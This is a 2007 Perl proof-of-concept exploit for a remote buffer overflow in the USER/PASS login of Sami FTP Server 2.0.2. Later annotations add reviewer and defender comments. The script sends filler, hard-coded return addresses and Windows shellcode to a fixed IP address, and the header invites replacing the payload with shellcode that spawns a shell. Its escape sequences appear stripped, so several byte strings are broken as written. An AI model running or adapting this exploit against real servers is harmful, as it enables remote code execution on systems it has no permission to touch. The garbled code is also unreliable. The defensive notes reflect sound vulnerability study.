# Title : Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit
# Published : 2007-01-17
# Author : UmZ
#!/usr/bin/perl
# Exploit for SAMI FTP version 2.0.2
# USER/PASS BUFFER OVERFLOW ARBITRARY REMOTE CODE EXECUTION (CALC.exe)
# You can put your own shellcode to spawn a shell
# Thursday 17th Jan 2007
# Tested on : Windows 2000 SP4 (Use your own return address for other flavors)
#
#
#
# Coded by UmZ! umz32.dll@gmail.com
# On behalf of : Secure Bytes Inc.
# http://www.secure-bytes.com/exploits/
#
#
#
# Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
#
#
# Note: After executing the exploit you will get "Cannot login User or password not correct."
# That doesn't mean the exploit failed: whenever you click on the Sami FTP server it will crash,
# resulting in the execution of calc.exe, and it will execute whenever the SAMI FTP server
# restarts until it is reinstalled.
# Flat script: opens one FTP control-channel session to a hard-coded host,
# sends a single, deliberately oversized USER argument via login(), and
# disconnects.  Nothing is read back except the login reply.  There is no
# argument parsing; the target address on the Net::FTP->new line and the
# platform-specific values inside $msg1 are edited by hand, as the header says.
#
# Defender's view: the only traffic is one FTP session whose USER command
# carries an argument hundreds of bytes long.  A server-side length check on
# USER/PASS arguments, an FTP-aware proxy, or an IDS rule on overlong USER
# commands sees this immediately.  The header names Sami FTP Server 2.0.2 as
# the affected version; hosts still running it should be upgraded or removed
# from untrusted networks rather than relying on detection alone.
#
# NOTE(review): no `use strict; use warnings;` — $ftp below is an undeclared
# package global.  Several string literals in this copy appear to have lost
# their backslashes in extraction ("x90", "rn", ...); the comments below
# describe the code as it is written, not as it was presumably intended.
use Net::FTP;
# Banner lines.  As written the trailing "n" is a literal character, not a newline.
print "Coded by UmZ! umz32.dll@gmail.comn";
print "http://www.secure-bytes.com/exploits/n";
# Connect to the hard-coded target.  Net::FTP->new returns undef and sets $@
# on failure, which is what the die message reports.  Debug => 0 silences
# the module's protocol trace.
$ftp = Net::FTP->new("192.168.100.250", Debug => 0) or die "Cannot connect : $@";
# Leading filler of the USER argument: as written, the three-character literal
# "x90" repeated 596 times.  The original trailing "#140" note is unexplained.
my $msg ="x90" x596; #140
# NOTE(review): $msg2 is built but never referenced below — dead code.
my $msg2 ="B"x484;
# Opaque byte string the header describes as launching calc.exe on
# Windows 2000 SP4; not decoded here.  The header says it can be replaced.
my $shellcode = "x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8".
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1".
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07".
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25".
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5".
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d".
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4".
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0".
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c".
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b".
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4";
# Second filler run, placed between the two short hex-looking groups and the payload.
my $test= "x90" x 108;
# Assemble the USER argument: leading filler, two short hex-looking groups
# (presumably the platform-specific return address the header says to change
# for other Windows versions — not verified here), more filler, the payload,
# and a literal "rn" (as written, not CRLF).
my $msg1=$msg. "x70xFDx8Bx01"."x96x64xF8x77". $test . $shellcode. "rn";
# Net::FTP::login(USER, PASS): the oversized string goes out as the USER
# argument, "umz" as the password.  The header says the server answers with a
# login failure even when the overflow lands, so reaching the die branch is
# the expected outcome; $ftp->message is the server's last reply text.
$ftp->login($msg1."rn ","umz") or die "Cannot login ", $ftp->message;
# Close the control connection.
$ftp->quit;